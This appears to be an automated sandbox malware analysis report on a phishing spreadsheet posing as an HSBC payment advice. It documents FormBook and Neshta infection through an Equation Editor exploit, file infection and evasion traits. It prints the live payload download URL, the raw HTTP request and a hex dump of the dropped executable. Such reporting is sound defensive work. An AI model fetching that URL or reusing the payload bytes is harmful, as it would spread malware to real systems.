Windows Analysis Report Payment Advice HSBC.xlsx

Overview

General Information

Sample Name: Payment Advice HSBC.xlsx
Analysis ID: 528781
MD5: e8e4ccc6201dd1b16a2133ba56441a5b
SHA1: f73a1fd7b0aea60425fef3e155cce42e2edfac21
SHA256: f1da130d39c64d903450d67844ba701667cce9b057eeac8283393c5d2673b5e5
Tags: VelvetSweatshop, xlsx

Detection

FormBook, Neshta
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Neshta
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Infects executable files (exe, dll, sys, html)
Drops PE files with a suspicious file extension
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Drops executable to a common third party application directory
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Unable to load, office file is protected or invalid
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Office Equation Editor has been started
Drops PE files to the user directory
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: Payment Advice HSBC.xlsx Virustotal: Detection: 34%
Source: Payment Advice HSBC.xlsx ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://198.12.91.205/50005/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://198.12.91.205/50005/vbc.exe Virustotal: Detection: 5%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.vbc.exe.400000.11.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.5.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.9.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.17.unpack Avira: Label: W32/Delf.I
Source: 5.2.vbc.exe.400000.1.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.19.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.13.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.7.unpack Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.15.unpack Avira: Label: W32/Delf.I

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Spreading:

Yara detected Neshta
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Infects executable files (exe, dll, sys, html)
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\updater.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\WinDirStat\windirstat.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\WinDirStat\Uninstall.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose, 5_2_00405080
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose, 5_2_00405634
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404F6C FindFirstFileA,FindClose, 5_2_00404F6C
Source: C:\Users\Public\vbc.exe Code function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose, 5_2_004056A7
Source: C:\Users\Public\vbc.exe Code function: 5_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA, 5_2_00406D40
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\1033\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.205:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.12.91.205:80

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:05:27 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Thu, 25 Nov 2021 03:22:49 GMTETag: "b7200-5d1947d38df57"Accept-Ranges: bytesContent-Length: 750080Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 01 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 66 0b 00 00 0a 00 00 00 00 00 00 72 85 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 85 0b 00 4f 00 00 00 00 a0 0b 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 65 0b 00 00 20 00 00 00 66 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 0b 00 00 08 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 70 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 85 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 54 21 01 00 03 00 00 00 8c 01 00 06 00 
6a 02 00 20 1b 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
GET /50005/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.12.91.205
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE55544.emf

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a raw input device (often for capturing keystrokes)
Source: vbc.exe, 00000005.00000003.502748576.00000000009A0000.00000004.00000001.sdmp Binary or memory string: _WinAPI_RegisterRawInputDevices.au3

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Yara signature match
Source: 5.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.17.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
